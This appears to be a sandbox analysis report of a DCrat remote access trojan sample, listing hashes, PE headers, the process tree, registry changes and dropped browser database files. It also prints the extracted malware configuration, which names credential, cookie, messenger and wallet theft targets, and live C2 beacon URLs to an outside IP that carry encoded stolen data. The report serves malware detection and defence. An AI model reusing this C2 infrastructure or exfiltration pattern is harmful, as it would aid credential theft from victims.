File name: | 0e4ab826459cb17dd81ac1f62fb2b637.exe |
Full analysis: | https://app.any.run/tasks/8c7511b2-e29f-49f1-9f78-b777f5763a64 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | April 01, 2023, 06:59:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 0E4AB826459CB17DD81AC1F62FB2B637 |
SHA1: | 2550D554733A48383EDB6E8BC0646893C14AF321 |
SHA256: | 5AF923EE6B4D6C39976AAA6AB187A9FA82FB9EA53AAED2486D8FF00A54FC005D |
SSDEEP: | 49152:exnjjGfr0Yw0T1JQS8mG3WxfY3xnr+SrsOsXtPjenjSlYnlGrWJYGPmzKRg3rC6e:IjnYE |
.exe | | | Win64 Executable (generic) (49.4) |
---|---|---|
.scr | | | Windows screen saver (23.4) |
.dll | | | Win32 Dynamic Link Library (generic) (11.7) |
.exe | | | Win32 Executable (generic) (8) |
.exe | | | Generic Win/DOS Executable (3.5) |
AssemblyVersion: | 1.0.0.0 |
---|---|
ProductVersion: | 1.0.0.0 |
ProductName: | - |
OriginalFileName: | Goqcymikjjp.exe |
LegalTrademarks: | - |
LegalCopyright: | - |
InternalName: | Goqcymikjjp.exe |
FileVersion: | 1.0.0.0 |
FileDescription: | - |
CompanyName: | - |
Comments: | - |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.0.0.0 |
FileVersionNumber: | 1.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x60bcfe |
UninitializedDataSize: | - |
InitializedDataSize: | 2048 |
CodeSize: | 6331904 |
LinkerVersion: | 8 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, 32-bit |
TimeStamp: | 2023:03:27 16:27:52+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 27-Mar-2023 16:27:52 |
Comments: | - |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.0.0.0 |
InternalName: | Goqcymikjjp.exe |
LegalCopyright: | - |
LegalTrademarks: | - |
OriginalFilename: | Goqcymikjjp.exe |
ProductName: | - |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 27-Mar-2023 16:27:52 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x00609D04 | 0x00609E00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.31895 |
.rsrc | 0x0060C000 | 0x00000570 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.97523 |
.reloc | 0x0060E000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0815394 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1600 | "C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe" | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
1224 | "C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe" | C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe | 0e4ab826459cb17dd81ac1f62fb2b637.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Version: 1.1.1o Modules
DcRat(PID) Process(1224) Rkwuzkqocmsprovider.exe Options Targetru searchpath%UsersFolder% - Fast sysinfotrue clipboardtrue screenshottrue filezillatrue discordtrue steamtrue telegramtrue historytrue cctrue formstrue passwordstrue cookiestrue ignorepartiallyemptydatafalse savebrowsersdatatosinglefilefalse MutexDCR_MUTEX-UmFunEUN2QKTuURlY86u C2 (1)http://80.66.64.164/@==QeyFmcvBXblRFdwlmcjNXY2Fma | |||||||||||||||
840 | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | — | 0e4ab826459cb17dd81ac1f62fb2b637.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.0.0.0 Modules
|
(PID) Process: | (1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\KTyh7ancxu | — | |
MD5:— | SHA256:— | |||
1600 | 0e4ab826459cb17dd81ac1f62fb2b637.exe | C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe | executable | |
MD5:ABC063B83C8F79F2958E5EE6AF58EFD9 | SHA256:D956494A0DD730970C27C092A2940659EB86A3993D53B74ABB931DAA1A21E611 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\ENHSdMymof | text | |
MD5:5D09B6238D23D8243F326557679DA858 | SHA256:DE48DE829B1EAA3D72A92BAFDB8B29EBAC7779A14E93C8E17BD6B5E810CE3424 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\cuomYCfzC0 | sqlite | |
MD5:387B1D63B45DA12EE4D0C68A9E777271 | SHA256:40BD4B959B25DBF4D65864B92F548C5373C12FC7EF99FE70A9BE479A90FBF0D2 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\12TNps9g1j | sqlite | |
MD5:1AA08FF2105515DE3602F503E87DFF1A | SHA256:D7446E2F307027C9BDA2A92D1DF1C13C376581372F6AE8708F4D5BACCB2E6813 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\jer2eZ2Hqc | sqlite | |
MD5:0A149D1DB8612AE149B4B3A03204D29F | SHA256:6984F4A4A4CBB11E3B6057314EC765D5210521478FF411F883FC5EC2F31D6768 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\Public\nltxvmn2.default\key4.db | sqlite | |
MD5:2D88BB69E75C2D609BA79F7353DAECC1 | SHA256:263ECB9445A828CEC98F7C19B2FF3B4DFAD99EE58C5E394E5F6778FD441415F3 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\TNwvbzqG6P | sqlite | |
MD5:FF3819BA79CA33058AB110FEC5CD0955 | SHA256:C5140A31EA483E1E6AFE2A2750B853FA46FA3C5B0A04C973094E23E6C8AD533E | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\znNJdABXKw | sqlite | |
MD5:C72DB02959D2F97D090B0051EE963AD7 | SHA256:6D8285E102CD46A9379778B223651ECEE043321E436DD15C2354EC59F5EB22A5 | |||
1224 | Rkwuzkqocmsprovider.exe | C:\Users\Public\nltxvmn2.default\cert9.db | sqlite | |
MD5:A365A828387B1BE4FA97C3D66CAA9737 | SHA256:0D06053B2562DCC977387B2C3C50BF5465C680844003B9C25C4B5341BE753154 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIhdTY1ATOwETYhF2N1YmY5cTMxITN3ITNzUjZhRWOlN2MxETNmRjY2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | — | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxE2Y3MWNjNWZ2MjYyUGZyYzYmFzYhBDNkNGMyUWN1QWNjNTZmJzMkJiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | — | — | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?VS=eWUOiNXxrlDJtY&xBEheqJsMcbRTCusqwxybdz8axatB=60rfYx6yxtUnHvH6Ev63&X5kcULGGrQarj=kjyn7v19EexVD0dtp&523cb4a88cd88085e6950574569f4c8e=ae1f010aadf78c1c01fd87c55bda0e34&81b4323d1ba298bdd827e6bc71221f6c=AZiFzN0gjZjVTNzMTY0ImN5gDM5Q2NhdjY2M2M3YTY4czY2EWM5cjM&VS=eWUOiNXxrlDJtY&xBEheqJsMcbRTCusqwxybdz8axatB=60rfYx6yxtUnHvH6Ev63&X5kcULGGrQarj=kjyn7v19EexVD0dtp | TR | text | 2.05 Kb | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIjRmZmR2M5M2MwczN4MGOwYmMxQWO5M2NihDOjZWYxkDNllTO0gDOzIiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W&dd7b03ae6c4e45bd2937ccddc7db3520=QX9JiI6IiMiRGM2MTOhlTMmBjY3QDN2UWN4gTN0EmZiRDOyQWOlJCLiMGZmZGZzkzYzAzN3gzY4AjZyEDZ5kzY3IGO4MmZhFTO0UWO5QDO4MjI6IyN4IWM1AjY3IWNyQjZ1QmNmV2NmJmMyADMwcDM1QTNxICLiEzMiRjZ5UWOklTYxE2M5IDZ3IWZ0ITMkJDZlJDM5EDM0ITZ0gTMiRjI6IyM2YTN2Y2MmFGNhFWYwcTZ5YmMhJjZwIGZzIDZ2AjZkJyes0nIwglZphjaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpdXaJdXSp9UaJdkTy0kMOhmSXpFbSdUTrZVbahmR6lFNRpmTtpFRPhmSXlVeJRkW1kkaNlmV65EaoRVTspUbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSplkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dpl0TKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNVW1VzVaBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwpESkpnVYF1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWSq5kMNpGTyUERMVTUE1Ue0M0TwkUaPlWTyI2cKNETpFlVRl2bqlUNKhEZ1Z1MipmSDxUaF1mY1Z1VhdlSp9Ua0IjYwR2ValnSDxUaF1mY1Z1VhdlSp9UarhEZw5UbJNXST1UM0kXTwkkaMFzaqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIlJTN1ImZjJmNidDZmNjN1MzN0IzMiFmY1MTOxYDZhljZiRTO4M2Y0IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIjRmZmR2M5M2MwczN4MGOwYmMxQWO5M2NihDOjZWYxkDNllTO0gDOzIiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W&dd7b03ae6c4e45bd2937ccddc7db3520=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 | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIjRmZmR2M5M2MwczN4MGOwYmMxQWO5M2NihDOjZWYxkDNllTO0gDOzIiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W&dd7b03ae6c4e45bd2937ccddc7db3520=QX9JiI6IiMiRGM2MTOhlTMmBjY3QDN2UWN4gTN0EmZiRDOyQWOlJCLiMGZmZGZzkzYzAzN3gzY4AjZyEDZ5kzY3IGO4MmZhFTO0UWO5QDO4MjI6IyN4IWM1AjY3IWNyQjZ1QmNmV2NmJmMyADMwcDM1QTNxICLiEzMiRjZ5UWOklTYxE2M5IDZ3IWZ0ITMkJDZlJDM5EDM0ITZ0gTMiRjI6IyM2YTN2Y2MmFGNhFWYwcTZ5YmMhJjZwIGZzIDZ2AjZkJyes0nIRZWOKlHUp9maJd3ZEpVMRdkW3VERNlXVE9UNVJTWoJlMO1mQUpFNVdVW4VkMNNTTq5ENZ1mTwsGVNtGZE1EeJNETphjaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpdXaJdXSp9UaJdkTy0kMOhmSXpFbSdUTrZVbahmR6lFNRpmTtpFRPhmSXlVeJRkW1kkaNlmV65EaoRVTspUbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSplkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dpl0TKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKNVW1VzVaBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwpESkpnVYF1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWSq5kMNpGTyUERMVTUE1Ue0M0TwkUaPlWTyI2cKNETpFlVRl2bqlUNKhEZ1Z1MipmSDxUaF1mY1Z1VhdlSp9Ua0IjYwR2ValnSDxUaF1mY1Z1VhdlSp9UarhEZw5UbJNXST1UM0kXTwkkaMFzaqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIlJTN1ImZjJmNidDZmNjN1MzN0IzMiFmY1MTOxYDZhljZiRTO4M2Y0IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | 